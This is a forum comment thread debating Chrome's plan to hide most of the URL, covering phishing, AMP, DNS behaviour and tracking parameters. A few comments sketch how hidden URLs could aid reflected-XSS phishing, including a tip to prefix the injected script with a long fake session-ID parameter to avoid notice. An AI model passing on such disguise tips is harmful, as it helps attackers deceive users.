Thanks. I enabled that flag last week and thought it didn't work. I didn't know there was a second step. Much better now.


Wow, thank you so much! My nervous system already feels better with this working.

Seriously, I keep looking at the address bar to make sure the URL is still there and I'm not dreaming.


Absolutely true, but well-meaning advice like "just use an adblocker" and "why not use a VPN" somehow doesn't quite cut it for me. Defaults matter.


Yes, they always remove such flags later; it does not matter that it's there right now.


This is exactly what I'm afraid of. There used to be chrome://flags/#omnibox-ui-hide-steady-state-url-scheme-and-subdomains (when I google how to make Chrome show the full URL, this is the recommended answer) but it's been gone entirely for several Chrome versions. I even toggled a flag to undo flag deprecations in Chrome 78 to get this back, but that didn't work very long; I think this flag has been totally dead since Chrome 80 or so.

I personally don't care much what the default is for the normal user, but I want to be able to have my full urls.


Which is ridiculous, because there are thousands of these flags for things they don't have an agenda to see gone.


In fairness, the OP is about another such flag, so the same argument would apply to that one.


> At chrome://flags ...

Is there also a #upgrade-to-firefox-immediately flag?


OK, I just don’t get it anymore. I mean I’m a happy Firefox user, so it’s not like this personally impacts me, but how in the heck is seemingly nobody acknowledging that this has been the behavior in Safari for a long time now? This seems to be a recurring pattern.


I've got a couple of guesses. Apple is somehow regarded as being a pro-user company, not having plans of taking over the web. Also, Apple users are accustomed to UI changes that result in visual simplicity. Nevermind that their actions result in patronizing the user just the same as Google does, in their case those actions are more likely to be perceived as innocuous.


Cmd+F "Safari": I'm equally surprised no one but you mentions it.

However: I believe Apple's motives are aligned with their users and they want their browser to be as safe and as easy to understand/use as possible. Their primary intention is to sell their shiny expensive hardware.

With Google it's more controversial, because who knows what the plan is. Combined with AMP, there is reason to be wary.

Ofc, one can make bad decisions based on good motives.


The other day, our 7 year old told me that [ is 5B and ] is 5D. I was quite impressed that he knew this, and I asked him how he knew it. He told me it was from reading the address bar in Roblox. Needlessly hiding technical details from kids is going to limit their learning.


This, exactly. People learn not only when they are forced to, but naturally from observing their environment too. The more opportunities to "spontaneously learn" you take away from them, the less they will learn.

Here's a comment I made several years ago, when Chrome tried before what it's trying again now (it's not the first time): https://news.ycombinator.com/item?id=7678729

Maybe this next point is starting to go into the realm of conspiracy theory, but I see far too much evidence of it every day: companies are doing this because they don't want users to learn. They want to keep users naive, docile, and compliant, and thus easier to "herd" for their purposes. They don't want people knowing the truth behind how things work; they would rather "developers" (and only those who explicitly chose to be one --- probably for monetary reasons) learn from their officially sanctioned documentation (which does not tell the whole truth), and not think or discover for themselves.

(I've memorised most of printable ASCII because I did a lot of Asm programming decades ago, so I instantly understood what you mean.)


Not sure how much actual conspiracy is in there, but I've definitely noticed that the gap between "consumer software" (highly optimized for ease of use, but also highly limited and designed with a specific intention for how users should interact with it) and "professional software" (powerful and flexible, but only usable after extensive training, often command-line only) is widening instead of closing.

There are also definitely conscious design decisions about how "cryptic" a particular feature should appear to users. I remember several Bugzilla threads with discussions of whether a config option should be exposed as an "ordinary" field in the settings or only as an option in about:config, so that normal users won't find it.


Coffee hasn't kicked in yet; it took me a while to figure out you were saying '[' URL-encodes to 5B and ']' URL-encodes to 5D.


I read that sentence 10 times. Wow.


This is how I learned them too (though about:… in IE5).


Is that a meaningful piece of learning, though? I’ve been doing webdev since the 1990s and still look up character codes if I need them.


I think the value is not in memorizing such trivia; for a 7-year-old it might be discovering the pattern of data encoding and its why and how. It opens all sorts of paths of discovery for understanding software in the future.

You'd be surprised how often veteran developers fail to grasp intermediate Unicode concepts (surrogate pairs, for instance), probably because they skipped over (or were not curious enough about) the implementation details of such abstractions.


Sure, but it's the curiosity about how things work under the hood that matters. If he sees [ being replaced with %5B, he'll ask why it does that. And that leads to learning.


Are you gatekeeping a 7-year-old? Learning about character encoding from first principles is an awesome accomplishment.


I’m saying learning character encoding doesn’t support this:

> Needlessly hiding technical details from kids is going to limit their learning.

I watch kids learning circuitry via redstone in Minecraft on iOS and Xbox - walled gardens, yet impressive learning nonetheless.


I agree kids can learn useful stuff in Minecraft, no doubt.

But when I was his age, all I had was MS-DOS 3.3. And I had to CD around to various directories, DIR *.EXE to remember the names of executables, etc. It was an environment that exposed more technical details, and kids who are predisposed to learn technical details learn a lot just by using it. Windows 10, doesn't promote the learning of technical details to anywhere near the same extent.

(I try to make up for it a bit. I introduced him to DOSBox.)


Wouldn’t it be better to be able to devote limited learning time to more useful things than locating oddly named executables, though?

It is a mistake to conflate “it was harder for me” with “I learned more”.

My kids can program more complicated stuff in Minecraft than I could at their age. Part of that is having a tool that’s fun and abstracts away the boring bits.


> Part of that is having a tool that’s fun and abstracts away the boring bits.

What is "boring" varies from person to person.

I know, when our son plays Minecraft Java Edition, he likes to play it with the debug screen (F3) on.

He doesn't understand what most of the details on that screen mean, although he is learning a few. (He was asking me to explain what X, Y and Z coordinates were.) But, even if he doesn't understand most of it, he still likes it, and probably sooner or later he'll ask me more questions about it.


When he told me this, I thought he was talking about ASCII, but I had to actually double-check with "man ascii", because 5B/5D sounded familiar but I wasn't 100% sure he was right.

But the point is not that he memorises the ASCII table. The value is that he learns that computers internally represent letters/punctuation as numbers. The underlying concept is what's important, and the learning of specific values is mainly useful as a way of learning and reinforcing that underlying concept.


Yep! Kids learn by observing.


Firefox became quite fast again after Quantum. For those of us who never "bought into" the whole Chrome ecosystem, there have always been adequate alternatives. Will check out: https://www.palemoon.org/


They have quite an interesting conversation on github: https://old.reddit.com/r/linux/comments/7w61aw/pale_moon_rem...

I'd stay clear of that project and use mainstream Firefox instead. And afaik they still don't support WebExtensions.


I currently run firefox developer edition - gives me access to custom extensions.


Suppose there never was a URL you could share.

Suppose you always had to tell people to 'Google it'.

Suppose 'I'm Feeling Lucky' was always the default, and the result was sold to the highest bidder.


Safari has been this way since 2014. I've never seen any pushback on Apple doing it over the past six years.

It's genuinely a benefit for the vast, vast majority of users, where the only important piece of information really is the domain name, to check which site you're actually on. And for more info, you can just click. Copying the URL becomes no more difficult.

The URL path beyond the domain is as useful to most people as an IP address, in other words not at all -- it's just noise. And displaying noise is bad UX. Pretty much only website developers and administrators and SEO people care about the full URL. Granted, there are a lot of those people here on HN, so I understand the pushback, but we're not most users.

But at the end of the day, I don't understand why people seem totally fine with Safari doing this, but not Google?


As long as you see the full URL when you hover/click on the bar, I am all for it as well.

I find some of the reactions to this ridiculously hyperbolic. "Biggest attack on the web in years"? Seriously?

I get it, Google is a gigantic monster that does not necessarily act in its users' best interests, but that does not mean we need to bring the pitchforks each time they launch an app update.


If recent history with AMP has shown anything, it is that yes, we need to bring our pitchforks every time.

And also precisely because of AMP, this might be a very dangerous step towards blurring the lines between original and AMP pages.


On that note, I noticed recently that Google search result links (on Firefox?) get rewritten. That is, you see the actual page URL when you hover over the link, but it's changed to their own redirect URL as soon as you click it.

I'm sure they've always been tracking these search result clicks, but I think this is somewhat new behavior, and I find it highly deceptive.


Chrome sends back your click 'behind the scenes', whereas Firefox does not, so Google forces Firefox users to click through their link so they can track your activity (and if you hit the back button, you also jump through their redirect).

uBlock Origin can block this behavior. Here's a posting with links to more resources on hyperlink auditing:

https://github.com/gorhill/uBlock/wiki/Dashboard:-Settings#d...
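The "behind the scenes" mechanism is hyperlink auditing: an anchor can carry a ping attribute, and the browser POSTs to that URL when the link is followed. Schematically (the tracker URL is invented):

  <!-- Following this link also fires a background POST to the ping URL. -->
  <a href="https://example.com/article"
     ping="https://tracker.example/collect">Example result</a>

That background request is exactly what the uBlock Origin setting blocks.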


The people who use Safari are exactly the demographic that this change targets. Chrome users include most developers, who are the ones complaining.


I’m a developer. I use safari/WebKit for 95% of my browsing. You can enable the full address among a bunch of other excellent developer settings and move on with life with a browser that works great.


Developers are <1% of users - anything outside of dev tools is not changed with them in mind.


I'm in favor of the full URL, but frankly didn't notice until just now that I haven't enabled Safari's "Show full website address" preference.


I strongly disagree. Ordinary users I interact with either understand the basic concept of the URL or understand it after an initial explanation. It becomes empowering to them in ways I often do not anticipate.


If I recall there was some grumbling, but Apple being Apple, they do what they want.


But why can't this be a toggle or user setting like in Safari? Why is it a one-true-Google-way of doing things when clearly there are users who want to keep it (even if it's just web developers)?


How do you know it won't be a toggle?

Right now it is a setting to enable in Chrome.

What makes you think that once it becomes default, the switch won't remain to be able to turn it off?

Chrome is built by developers. Presumably, they pay attention to what developers need from it. Which is why their debugging tools overall are so amazing.

Perhaps you should withhold criticism of what you assume they'll do until they, you know, actually do it.


Reading URLs is actually really hard - even for experts. This video covers the problems well: https://www.youtube.com/watch?v=0-wB1VY3Nrc

This is bad for web security, since the registerable domain is the part you have to trust, but it's surprisingly difficult to figure out that part.

However I feel a bit uneasy about this, since URLs are important and tell you where you are on a website. I prefer Firefox's approach, which emphasises the registerable domain in the URL bar and fades out the rest of it, making it easier to spot the important bit. It's still quite subtle, though; it could do with a clearer distinction.


[flagged]


The video points out things like: how do you spot an eTLD? There's .com, but what about .co.uk? .github.io? Do you know all the exceptions? There's basically a database of them and you just have to know them to correctly interpret the security origin of the domain.
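That database is the Public Suffix List (https://publicsuffix.org/). A sketch of how you would consult it, assuming the parse() API of the npm "psl" package:

  import psl from "psl";
  // Splits on PSL rules rather than on dots:
  psl.parse("foo.bar.github.io").domain; // "bar.github.io" (github.io is an eTLD)
  psl.parse("www.amazon.co.uk").domain;  // "amazon.co.uk"  (co.uk is an eTLD)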


The way we use DNS (reversed) does make URLs kind of confusing for specificity, like:

https://specific.more.less.example.com/less/more/specific.ht...


I am going to go against Hanlon's razor here, but doesn't the slow push away from URLs benefit Google?

A few years later, instead of typing news.ycombinator.com, you would need to search for "hacker news", scroll through the ads and then click on the link.

So it could be a slow transition to inserting a sort of interstitial ad into your browsing.


I'm against this. But: it's 2020 and still a huge number of people I deal with every day type the name of our product into their search bar and then login at the first site returned. Most don't know the difference between a browser and a specific website. It's all just a big Smush to them apparently.


Remember when ReadWriteWeb wrote an article about a new Facebook login feature and users who usually Googled facebook login and pressed the first result got all confused and angry? I don't think the average user today is any more knowledgeable about URLs.

https://www.theguardian.com/technology/blog/2010/feb/11/face...


Services that cater to the very lowest tier of users should also factor in the risks of that if they want to reap the rewards. And that's a great thing about an open platform such as the Internet.

I'm also against this in theory, but in practice I don't care much. We shall see.


It's $current_year is never a good excuse. $people not knowing stuff should not mean that everyone should get dumber to match $people.


URLs are confusing though. I am a veteran URL user and I learned something about them from this thread. Hiding them isn't necessarily better but many replies here seem to be denying that they are imperfect.


Imperfect and stable+standardized is preferable to unstable+unstandardized, in my opinion.


I agree. What I'm saying is that clearly, if you want to defeat this, a totally different approach needs to turn up, because 20 years of mainstream internet use has resulted in zero user education.


I doubt that. You mention in your parent post that people don't know the difference between a browser and a specific site. I think most people do. At least if they use more than one site.


What I meant was that in a tech support context if you ask people what browser they're using they will often say something like "I went to Product Name" or "I'm on Product Name". Then ask them what actual address they visited or again ask them what browser they are using and they will say something like "I went to the Internet".

I am not calling anybody dumb. I'm saying they don't care and don't know there is any reason to care.


I still doubt that. People know how to enter URLs. They choose not to because it's oftentimes easier just to search for where you want to go. Google Chrome hasn't gotten this market dominance by people not caring. It has to be installed actively.

Even if, showing the URL bar changes nothing for them, so why hide it?


It feels like a long time ago that people were talking of computing in the context of educating and empowering users rather than accessing commercial services.


> $people not knowing stuff should not mean that everyone should get dumber to match $people.

Exactly. We should push on the opposite direction (educate people and make the concepts clearer).


This, along with the inability to disable the async DNS feature in the latest Chrome for desktop versions (thus making pihole/adguard irrelevant), makes me accelerate the change to another browser.


I hate to be the person who's like "you're holding it wrong" but your usage of DNS is incorrect according to the RFCs. All configured DNS servers are assumed to serve the same content. The idea of every DNS request "trying" the first server, timing out, and then the next, and the next is a calcified implementation detail.

A DNS client looking at the list of servers, and marking the speed and reachability of each server, is the most basic optimization. It makes no sense for clients to add n seconds to every request for every unreachable DNS server.

The async DNS feature uses Chrome's internal DNS client, which behaves differently than glibc, and so pihole appears not to work. Chrome is not injecting its own DNS servers into the mix or whitelisting anything; it always uses your system's DNS servers, it just looks them all up in parallel, which it is allowed (and encouraged) to do by the RFC.

Make sure all your configured DNS servers are pihole and everything will work.
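
Concretely (192.168.1.2 and .3 being made-up pihole addresses for illustration), the safe setup lists only pihole-backed resolvers:

    # /etc/resolv.conf
    # Every listed server must serve the same view of DNS; a client is
    # free to query any of them, in any order, or all in parallel.
    nameserver 192.168.1.2
    nameserver 192.168.1.3   # optional second pihole -- not a public resolver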


Also, not opening external application links in incognito mode if that is the last (or the only) Chrome window with focus. It still drives me nuts.


I'm curious - why do you want to disable it?


Because I want to use my own DNS server and block ads at the DNS level rather than the browser level. With this move, Google has effectively whitelisted AdSense/AdWords to not be blocked regardless of the network settings of the device.


This is confusing.

https://www.xda-developers.com/fix-dns-ad-blocker-chrome/

Seems that the problem is not async DNS itself, but that Chrome ignores the system DNS settings and uses Google's own DNS servers instead.


That is a good point, I might have been pointing at the wrong issue in Chrome. I have only seen this behavior happen since 2-3 days ago and all my research pointed me to async dns being the culprit. I am really eager to find out if this can be disabled in any way, but my Chrome time has come to an end with recent developments.


Seems like a bug. Some environments cannot reach external DNS servers, so it would break resolution in general. This happened before and was fixed: https://bugs.chromium.org/p/chromium/issues/detail?id=265970 I couldn't find any report for the current issue though - maybe you should start one.


Chrome doesn't respect DNS settings anyway. I have in my resolv.conf:

    search my.home
And entering the hostname of my server just googles it, instead of trying a lookup first and googling only afterwards (or never; I don't see why the browser should contact the search engine just because I mistyped the URL).


This point merits an explanation. The file /etc/resolv.conf is a configuration file for the `dns` NSS module used by the glibc resolver.

Google's async DNS feature uses Chrome's own internal DNS resolver, which doesn't call getaddrinfo(). It would be incorrect for Chrome to parse this file and attempt to "respect" your settings because NSS is a series of black-box system-specific modules. If you removed the dns module from /etc/nsswitch.conf then resolv.conf wouldn't even enter the mix on your system and then Chrome would do the wrong thing. If the dns module behaved differently on your system and /etc/resolv.conf was actually /etc/resolv.json or /etc/resolver.conf then Chrome would again do the wrong thing.

When resolving a name, applications have two choices: either look up the name with glibc, sending the request through the NSS gauntlet of black-box modules and taking whatever it returns, or perform the DNS request themselves and ignore everything on the system. Any sort of hybrid approach would be more confusing.
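
For reference, the module chain lives in /etc/nsswitch.conf; on a typical glibc system the hosts line looks something like this (exact modules vary by distro):

    # /etc/nsswitch.conf
    hosts: files mdns4_minimal [NOTFOUND=return] dns
    # "files" reads /etc/hosts; only the "dns" module consults /etc/resolv.conf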


Hmm, so does this mean /etc/hosts will no longer work either, etc.? That's handled by the same glibc function too.


Why not just use a syntax highlighting approach on the address bar? Protocol one color, domain another, slashes one color, query params another, etc.
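
The pieces are easy to get at; here's a minimal sketch using Python's standard urllib.parse, splitting out exactly the components that could each get their own color:

    from urllib.parse import urlsplit

    parts = urlsplit("https://sub.example.co.uk/path/page?q=duck&lang=en#results")
    print(parts.scheme)    # https
    print(parts.netloc)    # sub.example.co.uk
    print(parts.path)      # /path/page
    print(parts.query)     # q=duck&lang=en
    print(parts.fragment)  # results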


It's a pretty obvious solution, especially to any programmer.

I'm having a hard time thinking of a situation where you have information, some more important and some less, where the correct solution is to delete the less important information. It still has importance!


Using color to convey information makes it very difficult to remain accessible while still working with themes and being aesthetically pleasing at the same time.


What you described is more like highlighting the function signature in one color and the entire body in another. Syntax highlighting for the URL would be more like domain/subdomain in one color, emphasising query fields in one color and params in another, with colors potentially varying based on their type/significance.

That might help make the URL more readable, but again it doesn't really help if the relevant parts of the path/query string for trust aren't immediately apparent.


Because UX/UI designers and art-inclined people would lose their minds.


Or a breadcrumb trail, as someone else said.


I'd personally prefer if it wasn't hidden, but after first-hand experiencing non-tech-savvy family members trying to decipher the query part, and some accusing someone of trying to hack them, I'm for the change. The whole query string philosophy is such an outdated hack. Today it's just thousands of tracking queries.

What I hate is how poorly they worded the warning for websites that use http instead of https. It says "connection not secure", which makes people think there is a hacker somewhere hacking their connection. What they should have done, and must correct, is make the wording "this website is not following safety guidelines". I'm tired of explaining.


Maybe it should say "connection not secured". It would be much more factual.


> trying to decipher the query part and some accusing someone of trying to hack them I'm for the change

At least back in the day they had the opportunity to learn what a query string is, and that no, nobody is hacking anyone.

However with these stupid changes there will no longer be an opportunity to learn even if you wanted to.


If you dumb down users, they become dumber.


People shouldn't have to educate themselves on the implementation details of the browser or the internet, any more than they educate themselves about the details of their car. We have many other complex systems with simple end-user goals, and people don't have to care about the details. Most Americans don't even have a gear shift.


What is the conclusion of your hypothesis, though, if users become unable to find and validate their services, e.g. online banking, against possible phishing sites or otherwise hacked pages? Knowledge is power. So we need to be careful about making people impoverished or too reliant on centrally commanded portals, or prepare to face the consequences.


Query strings, an outdated hack?

Look, pilgrim, that's the standard for you right there. It's called RFC 3986.


3.4. Query

   The query component contains non-hierarchical data that, along with
   data in the path component (Section 3.3), serves to identify a
   resource within the scope of the URI's scheme and naming authority
   (if any).


Today they are used for tracking strings more than anything else, and that's also the reason why they are hiding them. People didn't complain when they were used as search queries.


Wonder how long it’ll be before it shows the proxied URL on amp pages...


I think they're already trying to force that at the network level instead of the browser level using signed exchanges.

https://developers.google.com/web/updates/2018/11/signed-exc...


Signed exchanges are quite neat actually, they do not seem to depend on AMP at all. You could even use them to get arbitrary static resources hosted via IPFS in a seamless way.


For sure, just as AMP is also a neat technology that can be used by companies other than google.

But my understanding is that they intend to use signed exchanges specifically for their AMP URLs, finally finishing their efforts of forcing people to go to google.com without them ever realizing it.


Ffs. I’m going back to gopher at some point.


Which is soon to be usurped by Google because it starts with “Go.”



Gopher over SNA/OSI is worse than WWW/TCP/IP in terms of ability to publish UGC.


That's a feature


Google Network Control Program?


Or just switch to Firefox...


Firefox is going down the toilet as well. Lots of me-too-isms are appearing.

Really my point was in jest. I think we need to trash the entire www and start again with something content-focused, with a hard same-origin policy, and far, far lighter than what we have. I tried browsing the web on a dual-core Celeron N3010 recently and it was unusable on all mainstream browsers.


Wouldn't surprise me. Users are the product; what else is there to expect?


Yes, walling the garden has been the goal all along.


A couple of Google Chrome devs talk about the issues surrounding the readability of URLs, their security implications, and possible solutions in an episode of their podcast[0]. I think they make a compelling argument for hiding most of the URL in part to prevent phishing; however, I do think they should allow this behaviour to be toggled via a flag.

[0] https://youtu.be/0-wB1VY3Nrc


Do you know if this information is somewhere more accessible than a 20 minute video?

Hiding the https and www is already frustrating enough, and this change would make Chrome barely usable for my purposes.


The claimed purpose is basically just to prevent phishing.

They explain a number of reasons why it is difficult for people to extract from a URL the part which is relevant to security, i.e. the bit that affects who has authority over the page and how your cookies will be separated by the browser. The cookie sharing actually has some rules I didn't know about as a non-web developer but experienced URL user. They show how every browser is already going some way towards this, but they all have some problems; for example, Safari shows the full domain, not just the important part.


Looks like this will be great for reflected XSS attacks. Even advanced users will not be able to notice there's something weird going on outside of the domain name part of the URL. Perfect!

Basically any page on a website with this vulnerability will be usable to show a fake login page, and the user will not even notice they're not on /login, but on some weird path + ?_sort=somejavascript

Not that it's that hard to clean up the URL via the history API after you get access to the page via XSS at the moment, but there's still some short period of time where the full URL is shown in such a case, which may provoke suspicion.


Stick "?jsessionid=<random 80 character string>" in front of the xss and no one will ever look.


Their goal is full AMP dominance. Just look at these evil guys' faces. It's clear enough that they're going to pass their frustrations onto you, no matter what.


Conspiracy theory: This change is dictated by the Google AMP team that wants to take over the world without us knowing


> Conspiracy theory: This change is dictated by the Google AMP team that wants to take over the world without us knowing

I was just about to write this but I don't necessarily think it's that far off.

With signed exchanges, AMP pages have the ability to hide the fact you're accessing content through Google [1]. In 2016 Google wrote about testing 'mobile-first indexing' because more people are using mobile devices than desktop browsers [2].

[1] https://developers.google.com/search/docs/guides/about-amp#a... [2] https://webmasters.googleblog.com/2016/11/mobile-first-index...

If Google can control the URL narrative (keeping users from bouncing off AMP pages), it's just one more way for them to be the man in the middle.


I wonder if they’ll eventually hide the URL path from extensions (for security) and serve ads off google.com. Even serving ads from somewhere under google.com/amp would probably cause problems for ad blockers. Or maybe extensions see the rewritten URL only, so CanSignHttpExchanges is a way of changing third-party trackers and ads into first-party ones.

Also nice to see DigiCert helping them out, but I’m not surprised with how DigiCert’s product lineup isn’t much more than a test of how much of a sucker you are.



I disagree with the decision strongly, but I'm a developer and probably a "power user". A casual user might not even know what a URL is.

Do you know there's a staggering number of users who type "google.com" into Google?


> A casual user might not even know what a URL is.

And this will add a few extra hoops for them to jump through before they learn, so that they'll never have to leave the reassuring embrace of Google's ad trackers. How convenient. :)


I mean... not to be contrarian but does the average user need to know a URL?

Do I need to know an address to drive my car somewhere?

My knowledge that a place exists and I want to go there is sufficient to get me there, without having the physical address memorized.

As a power-user I obviously navigate through URL far more than the average user, but I am not convinced that say a 50 year old nurse using my web software needs to ever touch a URL even a single time, or that it would be beneficial to her user experience to even know what it is.


Maybe a slightly better analogy: with the URL, if you know your address, you can go straight there. With a car/driving, it would be like instant teleportation. Not knowing the URL means using Google search, and not knowing the street address means driving around and seeing a bunch of billboards. Removing the URL bar is like removing the ability to teleport so you can make sure people see the billboards.


That's implying there's an "after they learn" - even without those hoops.


Knowledge does not guarantee action, but there will be no action without knowledge.


It's not unimaginable to me that there will be no knowledge anyway, regardless of whether the URL is shown or not.


Hiding the URL won't make people learn what it is. And what great things can be accomplished when one changes it; this is how I learned a lot of things when the WWW was starting.

Are we promoting idiocracy now? If someone doesn't know what it is he/she should find out, or live with not knowing.


A large part of the reason for this confusion might be Google's long-standing efforts to blur the line between search and plain URL-based navigation, starting with integrating search into the location field in Chrome – Firefox and Safari[1] used to separate them, which makes the concepts clearer and avoids sending URLs and (local history) searches to the search provider unintentionally.

[1] http://toastytech.com/guis/osx14safari2.png


I remember this being the magical thing, together with less wasted vertical space, that made me switch to Chrome back in the day; it was (and still is) so simple! I always had the search field taking up precious space in Firefox but never really used it, because it was a different mental route: this is smart, but why am I not using it?

I think it is down to having to consciously decide to search before starting to type, instead of just starting to type. If you couldn't remember the URL, you'd just misspell it and search, and it works; for a more specific page, throw in another word and you get the correct page as a search result essentially every time.


Looking at that issue of consciously deciding whether to search from another angle, if I haven't decided yet, why would I want to inform Google of what I'm typing? Perhaps it's a private address of a private server with private information in the query string.

In any case, if I do decide to search, the search field is just a ctrl+k away, so the additional convenience of combining the fields never seemed that great to me. (But for Google, of course, it's a very convenient property of this design that everything the user types happens to end up being sent to Google.)


No, sorry, I just know of people that type google into bing.com ;)


Does anyone remember AOL keywords? I worry that this might be laying the ground to do something like that. Maybe it's not planned or maybe it's only an option they want on the table but obviously they have the incentive to do some kind of "Google keywords" and this would certainly help with that.


I can see the arguments for why this might be advantageous security-wise. I just hope they make it easy to disable (and it remains possible to disable in future) for those of us who are technically minded and are able to read URLs.


To enable the old behaviour you need to edit a browser flag. I don't know of any flags that disable Google 'engagement' features which have been kept around over the long term. The flags I've had to set in the past have all been removed after a few months.

Two recent examples off the top of my head are the recommended stories on the new tab page and the ability to disable images appearing in the omnibox.


What security arguments are there that are not also solved by highlighting the domain instead of removing critical information?


I would say that removing the URL is also bad UI: if the user sees that the URL changes with navigation, then it is possible to guess that it can be copied and pasted to give a link to the current page.

If the URL bar offered the full URL for copy/paste but showed only the domain, then the full-URL copy/paste feature would be hidden.


Or you just hit the share button? I think copy-and-paste would be considered the bad UX if it were a new idea today.

I think user-visible links would be considered bad UX if they were presented today.

“Alright then you copy this opaque hundred character string into your chat window, make sure you get everything after the dollar sign, or strip it out. Depends on the site.”

Copy and paste is the lowest common denominator of IPC.


Or you just hit the share button?

...which does who-knows-what behind your back, including possibly communicating with a third-party to see if you are "properly authorised to share", and meanwhile allowing them to subtly insert themselves into monitoring everyone's communication?

Do NOT want.


I believe that Google has evaluated it very carefully from all the possible perspectives and the net outcome for them was positive, so they went with it.

I assume that they care more about blurring the line between the "Google"-served internet and the regular internet than about losing 2% of Chrome's usage rate.


> positive

positive for them, not necessarily anyone else.


Google is grooming the next generation of users. It wants to be the Internet, the way IE (the E logo) used to be the Internet to many users.

Can you imagine removing house numbers from street addresses? "Where did you buy that?" "On Main St., but there wasn't any number..."

If the URLs are ugly, it's not Google's place to regulate that, but the website owner's.

If this is to protect users, then instead of removing information, add to it and/or make it more user-friendly.


The click/edit to show the full URL is a good and intuitive design. A lot of websites just have terribly designed URLs, with tons of obscure nesting paths and ?x=y flags that users don't care about. Here's what I got from searching the word "duck" in the Chrome search bar:

    https://www.google.com/search?q=duck&oq=duck&aqs=chrome..69i57j69i59j0l3j46j0j69i65.864j0j7&sourceid=chrome&ie=UTF-8
why would I care about the oq, aqs, sourceid and ie? If I really have to know the aqs value I can just simply click and have it.


why would I care about the op, aps, sourceid and ie?

Because they may be tracking identifiers...

...which I could argue is precisely why they don't want you to know. I always sanitise URLs when I share them with others, because of such things.


> I always sanitise URLs when I share them with others, because of such things.

Same here. Before sharing URLs with others, I often experiment with removing parameters to find the minimal URL that still works, and then share that.
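
Scripting that cleanup is straightforward; a rough sketch in Python, where the blocklist is my own guess at common trackers rather than anything exhaustive:

    from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode

    # Hypothetical blocklist; extend to taste
    TRACKERS = {"utm_source", "utm_medium", "utm_campaign", "utm_term",
                "utm_content", "gclid", "fbclid"}

    def sanitize(url):
        parts = urlsplit(url)
        kept = [(k, v) for k, v in parse_qsl(parts.query) if k not in TRACKERS]
        return urlunsplit(parts._replace(query=urlencode(kept)))

    print(sanitize("https://example.com/article?id=7&utm_source=hn&gclid=abc123"))
    # https://example.com/article?id=7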


The sad part is that Mozilla is probably going to follow suit just like they did with the previous attacks on the bar.


This is a setting, in flags (i.e. not in regular settings, the whole section in the ui is marked 'experiments') in the dev/canary builds of the browser. It defaults to off. The article (and even its slightly HN-improved title) is pure ragebait.


The setting will go away, as such things always do.


There are actually tons of Chrome experiments that never launch 100% and have their flag removed. They are experiments for a reason. This lets the Chrome team iterate on things and try it out.


They don't 'always do', and the article is still flagworthy ragebait. There are dog farts that serve intellectual curiosity better than this type of thing.


I've revised the title to reflect this a little better. The discussion indicates community interest in the topic that maybe exceeds the impact of this particular story, but it's genuine interest, and I don't think it's just rage.


While the title is ragebait for sure, Google's intent to eliminate the URL and replace it with "something better" was clearly stated more than a year ago. This article tells us they haven't given up on their efforts.


I actually don't mind this for the gen pop. For them, showing the URL is a bit like showing the path to the current process in the title bar.

As a dev, hiding the HTTPS prefix is already irritating especially when copying the URL. If you copy the whole URL, you're fine. If you manually select part of it, starting with the domain, the prefix doesn't copy.

I expect this upcoming change will exacerbate this kind of problem.

Don't we just need a persistent dev mode that doesn't mess around with the URL?


I see absolutely no benefit whatsoever for the general population. Dumbing things down for people does not make technology easier, it makes people dumber.

If your goal is to make people dumb and compliant, this is a great idea. Of course we know that's what Google's goal is, because that's what keeps the money flowing.


> Dumbing things down for people does not make technology easier

That's a bit of an absurd claim. Should my grandparents just be using luakit instead of Safari? Are you sure you aren't projecting your experience of technology onto people with a totally different experience of it to you?

>I see absolutely no benefit whatsoever for the general population

A benefit is reduced probability of being phished.


> Dumbing things down for people does not make technology easier, it makes people dumber.

It’s important to understand that while we, the users of Hacker News, may find it odd that everyone doesn’t know these things, perspective will tell us they probably have other priorities for their time, and that’s OK.

I don’t know, and honestly don’t care to know or prioritize the deep and intricate complexities of how deodorant or shampoo is made—or how it’s distributed, made safe for human use, etc. This does not make me dumber, it frees up my mental time for other priorities.

The same can be said for the 1000s of things I use daily from toothpaste to refrigerators to stop-lights to dentistry. While I may have a general idea how these processes happen, my knowledge is by no means expansive.

A deep understanding of everything should absolutely not be a requirement to function in a society.

Is Google doing this for bad reasons? Maybe. But let’s not pretend as if simplifying things makes people dumber. It’s freeing up our limited resources.

Expecting everyone to know deep details on the thousands of things they use everyday would absolutely bog us down into uselessness.

One of the smartest things we ever did was to free ourselves from needing an intense understanding of everything we use throughout the day.

As you move throughout today, notice the thousands of things you interact with, having little idea what went into them.


I spent an extra 10-15 minutes trying to debug an issue with Shibboleth last week with two other devs who had never set it up on a server before.

Why? Because we weren't forcing HTTPS in IIS yet, and while I thought I had told it to go to the HTTPS site, I was either wrong or it had changed. The address bar notification no longer jumps out at me.

I second a persistent dev mode / not continuing to remove address data from the address bar by default.


There is no company better equipped to detect fraudulent domains than Google. They have the most data, the most engineers, most anything that matters here.

This is something else.

I'm actually using Edge and it's not terrible. Having multiple choices in the market is good.


Software should be designed for the user experience.

Including features that help support, diagnose, log, test, debug, and develop are part of that, especially for software that provides a platform. For platforms, developers are one kind of user.

However, developer features should be out-of-the-way by default. Anything beyond the domain is not meaningful to end-users and should be hidden by default in the same way other developer tools are.


This is likely about replacing URIs with "web identity", i.e. certificate-signed content. The browser address bar would display the publisher name instead of site name.

2018 discussion with Google's Chrome demo at AMP event: https://news.ycombinator.com/item?id=17923156


Isn't this a good example of "feature creep"? I don't see any reason why partially hiding the URL makes a browser more useful.

It reminds me of a company which developed a product which was more or less done. So the SWE manager and the product manager made up new (pretty useless) features just to tell their bosses the devs are busy and the team must stay intact.


To try and think of an upside for the user, it might help people detect phishing by making the domain name more prominent.

I've seen phishing sites like support.google.com.8n.cn where the right side (the most important) just disappears into the /path. Though this attack is even more brilliant on mobile devices that truncate the right hand side and leave with you with "support.google.com...".

Aside, I encourage fellow HNers to purposely visit seedy websites in a VM without an ad blocker. Especially if you haven't been exposed to crappy behavior since the popup/under days. Great way to see the state of hostile web practices, like unblockable popups and fake macOS notifications.


If they want the domain to be more prominent, they could also just make it... more prominent. Highlight it more and separate it.


This is what Firefox does.


Sounds to me like "support.google.com.8n.cn" would still show up as "support.google.com..." on mobile, even when Chrome hides the URL, wouldn't it?


It makes their serving of AMP less transparent, which is a good thing for them. I guess.


I'm starting to wonder when the EU will raise the anti-trust flag. It seems obvious to me that Google is trying to use its start page market dominance to become the only webpage served on the Internet.



This is the only economically rational explanation I can think of. Unless it ties into other user-abusive projects they have planned.


What about reducing phishing? Seems more obvious


Why assume good intentions when economic incentives (which we already know they have) already explain it?


